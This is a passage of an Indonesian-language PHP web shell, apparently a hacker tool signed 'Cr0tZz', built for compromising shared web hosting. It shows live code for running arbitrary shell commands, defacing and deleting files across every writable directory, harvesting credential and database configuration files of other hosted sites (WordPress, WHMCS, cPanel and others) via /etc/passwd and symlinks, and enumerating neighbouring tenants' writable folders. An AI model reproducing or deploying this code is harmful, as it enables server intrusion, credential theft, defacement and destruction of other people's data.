  493.     <form method='post' enctype='multipart/form-data'>
  494.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  495.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  496.     <input type='file' name='ix_file'>
  497.     <input type='submit' value='upload' name='upload'>
  498.     </form>";
  499.     echo $act;
  500.     echo "</center>";
  501. } elseif($_GET['do'] == 'cmd') {
  502.     echo "<form method='post'>
  503.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  504.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  505.     </form>";
  506.     if($_POST['do_cmd']) {
  507.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  508.     }
  509. } elseif($_GET['do'] == 'mass_deface') {
  510.     function sabun_massal($dir,$namafile,$isi_script) {
  511.         if(is_writable($dir)) {
  512.             $dira = scandir($dir);
  513.             foreach($dira as $dirb) {
  514.                 $dirc = "$dir/$dirb";
  515.                 $lokasi = $dirc.'/'.$namafile;
  516.                 if($dirb === '.') {
  517.                     file_put_contents($lokasi, $isi_script);
  518.                 } elseif($dirb === '..') {
  519.                     file_put_contents($lokasi, $isi_script);
  520.                 } else {
  521.                     if(is_dir($dirc)) {
  522.                         if(is_writable($dirc)) {
  523.                             echo "[<font color=white>DONE</font>] $lokasi<br>";
  524.                             file_put_contents($lokasi, $isi_script);
  525.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  526.                         }
  527.                     }
  528.                 }
  529.             }
  530.         }
  531.     }
  532.     function sabun_biasa($dir,$namafile,$isi_script) {
  533.         if(is_writable($dir)) {
  534.             $dira = scandir($dir);
  535.             foreach($dira as $dirb) {
  536.                 $dirc = "$dir/$dirb";
  537.                 $lokasi = $dirc.'/'.$namafile;
  538.                 if($dirb === '.') {
  539.                     file_put_contents($lokasi, $isi_script);
  540.                 } elseif($dirb === '..') {
  541.                     file_put_contents($lokasi, $isi_script);
  542.                 } else {
  543.                     if(is_dir($dirc)) {
  544.                         if(is_writable($dirc)) {
  545.                             echo "[<font color=white>DONE</font>] $dirb/$namafile<br>";
  546.                             file_put_contents($lokasi, $isi_script);
  547.                         }
  548.                     }
  549.                 }
  550.             }
  551.         }
  552.     }
  553.     if($_POST['start']) {
  554.         if($_POST['tipe_sabun'] == 'mahal') {
  555.             echo "<div style='margin: 5px auto; padding: 5px'>";
  556.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  557.             echo "</div>";
  558.         } elseif($_POST['tipe_sabun'] == 'murah') {
  559.             echo "<div style='margin: 5px auto; padding: 5px'>";
  560.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  561.             echo "</div>";
  562.         }
  563.     } else {
  564.     echo "<center>";
  565.     echo "<form method='post'>
  566.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  567.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  568.     <font style='text-decoration: underline;'>Folder:</font><br>
  569.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  570.     <font style='text-decoration: underline;'>Filename:</font><br>
  571.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  572.     <font style='text-decoration: underline;'>Index File:</font><br>
  573.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Mr.4c1L Cr0tZz</textarea><br>
  574.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  575.     </form></center>";
  576.     }
  577. } elseif($_GET['do'] == 'mass_delete') {
  578.     function hapus_massal($dir,$namafile) {
  579.         if(is_writable($dir)) {
  580.             $dira = scandir($dir);
  581.             foreach($dira as $dirb) {
  582.                 $dirc = "$dir/$dirb";
  583.                 $lokasi = $dirc.'/'.$namafile;
  584.                 if($dirb === '.') {
  585.                     if(file_exists("$dir/$namafile")) {
  586.                         unlink("$dir/$namafile");
  587.                     }
  588.                 } elseif($dirb === '..') {
  589.                     if(file_exists("".dirname($dir)."/$namafile")) {
  590.                         unlink("".dirname($dir)."/$namafile");
  591.                     }
  592.                 } else {
  593.                     if(is_dir($dirc)) {
  594.                         if(is_writable($dirc)) {
  595.                             if(file_exists($lokasi)) {
  596.                                 echo "[<font color=white>DELETED</font>] $lokasi<br>";
  597.                                 unlink($lokasi);
  598.                                 $idx = hapus_massal($dirc,$namafile);
  599.                             }
  600.                         }
  601.                     }
  602.                 }
  603.             }
  604.         }
  605.     }
  606.     if($_POST['start']) {
  607.         echo "<div style='margin: 5px auto; padding: 5px'>";
  608.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  609.         echo "</div>";
  610.     } else {
  611.     echo "<center>";
  612.     echo "<form method='post'>
  613.     <font style='text-decoration: underline;'>Folder:</font><br>
  614.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  615.     <font style='text-decoration: underline;'>Filename:</font><br>
  616.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  617.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  618.     </form></center>";
  619.     }
  620. } elseif($_GET['do'] == 'config') {
  621.     $idx = mkdir("Cr0tz_config", 0777);
  622.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  623.     $htc = fopen("Cr0tz_config/.htaccess","w");
  624.     fwrite($htc, $isi_htc);
  625.     fclose($htc);
  626.     if(preg_match("/vhosts|vhost/", $dir)) {
  627.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  628.         $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  629.         $file = "Dav_config/vhost.cin";
  630.         $handle = fopen($file ,"w+");
  631.         fwrite($handle ,base64_decode($vhost));
  632.         fclose($handle);
  633.         chmod($file, 0755);
  634.         if(exe("cd Dav_config && ./vhost.cin")) {
  635.             echo "<center><a href='$link_config/Cr0tz_config'><font color=white>Done</font></a></center>";
  636.         } else {
  637.             echo "<center><a href='$link_config/Cr0tz_config/vhost.cin'><font color=white>Done</font></a></center>";
  638.         }
  639.  
  640.     } else {
  641.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  642.         while($passwd = fgets($etc)) {
  643.             if($passwd == "" || !$etc) {
  644.                 echo "<font color=red>Can't read /etc/passwd</font>";
  645.             } else {
  646.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
  647.                 foreach($user_config[1] as $user_idx) {
  648.                     $user_config_dir = "/home/$user_idx/public_html/";
  649.                     if(is_readable($user_config_dir)) {
  650.                         $grab_config = array(
  651.                             "/home/$user_idx/.my.cnf" => "cpanel",
  652.                             "/home/$user_idx/.accesshash" => "WHM-accesshash",
  653.                             "$user_config_dir/po-content/config.php" => "Popoji",
  654.                             "$user_config_dir/vdo_config.php" => "Voodoo",
  655.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  656.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
  657.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  658.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  659.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
  660.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  661.                             "$user_config_dir/forum/config.php" => "phpBB",
  662.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
  663.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  664.                             "$user_config_dir/app/etc/local.xml" => "Magento",
  665.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
  666.                             "$user_config_dir/configuration.php" => "Joomla",
  667.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
  668.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  669.                             "$user_config_dir/wp-config.php" => "WordPress",
  670.                             "$user_config_dir/admin/config.php" => "OpenCart",
  671.                             "$user_config_dir/slconfig.php" => "Sitelok",
  672.                             "$user_config_dir/application/config/database.php" => "Ellislab");
  673.                         foreach($grab_config as $config => $nama_config) {
  674.                             $ambil_config = file_get_contents($config);
  675.                             if($ambil_config == '') {
  676.                             } else {
  677.                                 $file_config = fopen("Cr0tz_config/$user_idx-$nama_config.txt","w");
  678.                                 fputs($file_config,$ambil_config);
  679.                             }
  680.                         }
  681.                     }      
  682.                 }
  683.             }  
  684.         }
  685.     echo "<center><a href='?dir=$dir/Cr0tz_config'><font color=white>Done</font></a></center>";
  686.     }
  687. } elseif($_GET['do'] == 'jumping') {
  688.     $i = 0;
  689.     echo "<div class='margin: 5px auto;'>";
  690.     if(preg_match("/hsphere/", $dir)) {
  691.         $urls = explode("\r\n", $_POST['url']);
  692.         if(isset($_POST['jump'])) {
  693.             echo "<pre>";
  694.             foreach($urls as $url) {
  695.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  696.                 $etc = "/etc/passwd";
  697.                 $f = fopen($etc,"r");
  698.                 while($gets = fgets($f)) {
  699.                     $pecah = explode(":", $gets);
  700.                     $user = $pecah[0];
  701.                     $dir_user = "/hsphere/local/home/$user";
  702.                     if(is_dir($dir_user) === true) {
  703.                         $url_user = $dir_user."/".$url;
  704.                         if(is_readable($url_user)) {
  705.                             $i++;
  706.                             $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  707.                             if(is_writable($url_user)) {
  708.                                 $jrw = "[<font color=white>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  709.                             }
  710.                             echo $jrw."<br>";
  711.                         }
  712.                     }
  713.                 }
  714.             }
  715.         if($i == 0) {
  716.         } else {
  717.             echo "<br>Total ada ".$i." Kimcil di ".$ip;
  718.         }
  719.         echo "</pre>";
  720.         } else {
  721.             echo '<center>
  722.                   <form method="post">
  723.                   List Domains: <br>
  724.                   <textarea name="url" style="width: 500px; height: 250px;">';
  725.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  726.             while($getss = fgets($fp)) {
  727.                 echo $getss;
  728.             }
  729.             echo  '</textarea><br>
  730.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  731.                   </form></center>';
  732.         }
  733.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
  734.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  735.         $urls = explode("\r\n", $_POST['url']);
  736.         if(isset($_POST['jump'])) {
  737.             echo "<pre>";
  738.             foreach($urls as $url) {
  739.                 $url = str_replace("www.", "", $url);
  740.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  741.                 if(is_dir($web_vh) === true) {
  742.                     if(is_readable($web_vh)) {
  743.                         $i++;
  744.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  745.                         if(is_writable($web_vh)) {
  746.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  747.                         }
  748.                         echo $jrw."<br>";
  749.                     }
  750.                 }
  751.             }
  752.         if($i == 0) {
  753.         } else {
  754.             echo "<br>Total ada ".$i." Kimcil di ".$ip;
  755.         }
  756.         echo "</pre>";
  757.         } else {
  758.             echo '<center>
  759.                   <form method="post">
  760.                   List Domains: <br>
  761.                   <textarea name="url" style="width: 500px; height: 250px;">';
  762.                   bing("ip:$ip");
  763.             echo  '</textarea><br>
  764.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  765.                   </form></center>';
  766.         }
  767.     } else {
  768.         echo "<pre>";
  769.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  770.         while($passwd = fgets($etc)) {
  771.             if($passwd == '' || !$etc) {
  772.                 echo "<font color=red>Can't read /etc/passwd</font>";
  773.             } else {
  774.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  775.                 foreach($user_jumping[1] as $user_idx_jump) {
  776.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  777.                     if(is_readable($user_jumping_dir)) {
  778.                         $i++;
  779.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  780.                         if(is_writable($user_jumping_dir)) {
  781.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  782.                         }
  783.                         echo $jrw;
  784.                         if(function_exists('posix_getpwuid')) {
  785.                             $domain_jump = file_get_contents("/etc/named.conf");   
  786.                             if($domain_jump == '') {
  787.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  788.                             } else {
  789.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  790.                                 foreach($domains_jump[1] as $dj) {
  791.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  792.                                     $user_jumping_url = $user_jumping_url['name'];
  793.                                     if($user_jumping_url == $user_idx_jump) {
  794.                                         echo " => ( <u>$dj</u> )<br>";
  795.                                         break;
  796.                                     }
  797.                                 }
  798.                             }
  799.                         } else {
  800.                             echo "<br>";
  801.                         }
  802.                     }
  803.                 }
  804.             }
  805.         }
  806.         if($i == 0) {
  807.         } else {
  808.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  809.         }
  810.         echo "</pre>";
  811.     }
  812.     echo "</div>";
  813. } elseif($_GET['do'] == 'symlink') {
  814. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  815. $d0mains = @file("/etc/named.conf");
  816. ##httaces
  817. if($d0mains){
  818. @mkdir("Cr0tz_Symlink",0777);
  819. @chdir("Cr0tz_Symlink");
  820. @exe("ln -s / root");
  821. $file3 = 'Options Indexes FollowSymLinks
  822. DirectoryIndex 0xaN0n.htm
  823. AddType text/plain .php
  824. AddHandler text/plain .php
  825. Satisfy Any';
  826. $fp3 = fopen('.htaccess','w');
  827. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  828. echo "
  829. <table align=center border=1 style='width:60%;border-color:#333333;'>
  830. <tr>
  831. <td align=center><font size=2>S. No.</font></td>
  832. <td align=center><font size=2>Domains</font></td>
  833. <td align=center><font size=2>Users</font></td>
  834. <td align=center><font size=2>Symlink</font></td>
  835. </tr>";
  836. $dcount = 1;
  837. foreach($d0mains as $d0main){
  838. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  839. flush();
  840. if(strlen(trim($domains[1][0])) > 2){
  841. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  842. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  843. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  844. <td>".$user['name']."</td>
  845. <td><a href='$full/Cr0tz_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  846. flush();
  847. $dcount++;}}}
  848. echo "</table>";
  849. }else{
  850. $TEST=@file('/etc/passwd');
  851. if ($TEST){
  852. @mkdir("Cr0tz_Symlink",0777);
  853. @chdir("Cr0tz_Symlink");
  854. exe("ln -s / root");
  855. $file3 = 'Options Indexes FollowSymLinks
  856. DirectoryIndex 0xaN0n.htm
  857. AddType text/plain .php
  858. AddHandler text/plain .php
  859. Satisfy Any';
  860.  $fp3 = fopen('.htaccess','w');
  861.  $fw3 = fwrite($fp3,$file3);
  862.  @fclose($fp3);
  863.  echo "
  864. <table align=center border=1><tr>
  865. <td align=center><font size=3>S. No.</font></td>
  866. <td align=center><font size=3>Users</font></td>
  867. <td align=center><font size=3>Symlink</font></td></tr>";
  868.  $dcount = 1;
  869.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  870.  while(!feof($file)){
  871.  $s = fgets($file);
  872.  $matches = array();
  873.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  874.  $matches = str_replace("home/","",$matches[1]);
